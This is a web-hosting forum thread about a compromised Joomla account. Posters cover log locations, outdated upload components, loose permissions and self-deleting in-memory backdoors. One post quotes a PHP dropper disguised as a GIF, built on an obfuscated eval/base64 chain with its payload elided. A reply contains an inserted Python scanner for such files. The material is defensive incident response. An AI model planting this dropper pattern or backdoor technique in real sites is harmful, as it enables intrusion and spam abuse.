
Checking strange activity on account

Discussion in 'Security' started by madpato, Oct 14, 2013.

  1. madpato

    madpato Active Member

    Joined:
    May 30, 2008
    Messages:
    41
    Likes Received:
    0
    Trophy Points:
    6
    Hello

    I have a user who I believe has been hacked and is sending spam. I have CSF and it let me know which file was doing this; I got rid of it (yesterday), but today more PHP files showed up in the same folder, so I assume this is not over. I even got some GIF files with strange code like this:

    Code:
    GIF89aGbkht
    <?php eval(gzinflate(str_rot13(base64_decode('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')))); ?>
    Now I want to know where I can look to see the origin of this. I tried the FTP logs and found nothing, and /var/log/messages has nothing regarding the location (or even mentioning the user account).
    What I do know is that this user has an old Joomla install, which I know for a fact is probably the reason for this. What I need to know is a server-side solution to stop the creation of those files. Maybe changing the permissions of folders?

    Any ideas? Thanks.
     
  2. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    998
    Likes Received:
    10
    Trophy Points:
    18
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    You should check that account's access logs:
    /home/CPANELUSERNAME/access_logs
     
  3. madpato

    madpato Active Member

    Joined:
    May 30, 2008
    Messages:
    41
    Likes Received:
    0
    Trophy Points:
    6
    Hi

    I'm afraid that directory is empty. Maybe I have something disabled that prevents the log from appearing?
     
  4. quizknows

    quizknows Well-Known Member

    Joined:
    Oct 20, 2009
    Messages:
    940
    Likes Received:
    55
    Trophy Points:
    28
    cPanel Access Level:
    DataCenter Provider
    Check /usr/local/apache/domlogs

    However, they need to update / patch their software. No amount of server-side security can make up for users running hackable applications. Do not allow people to run vulnerable applications on your server. A good modsecurity ruleset can stop a lot of hacks, but it is not foolproof.

    If the file in question is in public_html/images/stories/ or public_html/tmp/, they probably have a hackable com_jce component. Check the date on the files inside public_html/components/com_jce/. If they are more than a year or two old, that is the easiest way for an attacker to upload that code to a Joomla site.
     
  5. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,678
    Likes Received:
    654
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    Hello :)

    Also, check to see if any of the directories within this account are using insecure permissions (e.g. 0777). It's possible the scripts are uploaded through a Joomla plugin that allows uploads of this nature.

    Thank you.
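    As an added example (not code from this thread or from cPanel), a small Python scan for the two indicators raised so far: files that start with a GIF header but carry a `<?php` tag and the eval/gzinflate/str_rot13/base64_decode chain shown in the first post, and directories left world-writable (0777) as mentioned above. The indicator names, the 1 MiB read limit and the sample bytes are my own choices.

```python
import os
import re
import stat

# Indicator 1: the dropper in the first post starts with a GIF header but is really PHP.
GIF_MAGIC = (b"GIF89a", b"GIF87a")
# Indicator 2: the eval(gzinflate(str_rot13(base64_decode(...)))) chain it used.
OBFUSCATED_EVAL = re.compile(
    rb"eval\s*\(\s*(gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I)


def classify_bytes(data):
    """Return indicator names found in a file's leading bytes (empty list if clean)."""
    hits = []
    if data.startswith(GIF_MAGIC) and b"<?php" in data:
        hits.append("gif-php-polyglot")
    if OBFUSCATED_EVAL.search(data):
        hits.append("obfuscated-eval")
    return hits


def is_world_writable(mode):
    """True for directory modes such as 0777 that let any local user drop files."""
    return bool(stat.S_IMODE(mode) & stat.S_IWOTH)


def scan_tree(root, max_bytes=1024 * 1024):
    """Walk root; map each suspicious path to its indicators (symlinks skipped)."""
    results = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if is_world_writable(os.lstat(dirpath).st_mode):
            results[dirpath] = ["world-writable-dir"]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            try:
                with open(path, "rb") as fh:  # header and eval chain sit near the top
                    hits = classify_bytes(fh.read(max_bytes))
            except OSError:
                continue
            if hits:
                results[path] = hits
    return results


if __name__ == "__main__":
    import sys
    for path, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(f"{path}: {', '.join(hits)}")
```

Run it as `python3 scan.py /home/CPANELUSERNAME/public_html`; a hit is a reason to look at that file and the access logs for its upload, not proof on its own.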
     
  6. sehh

    sehh Well-Known Member

    Joined:
    Feb 11, 2006
    Messages:
    579
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Europe
    There is another cool way they use to do this: once they compromise an account, they upload a file, execute it and delete it, while leaving the process alive and kicking in memory!

    Thus, there is no file for you to find; it's just not there because it deletes itself.

    Once this process is started, the file will open a TCP port and listen for remote commands, execute code, upload files in tmp directories, send information about the server to a remote listener, so on and so forth.

    So check the running processes, I've seen them use process names like "mysql" and similar ones.

    I found their trick quite effective and imaginative! :)
     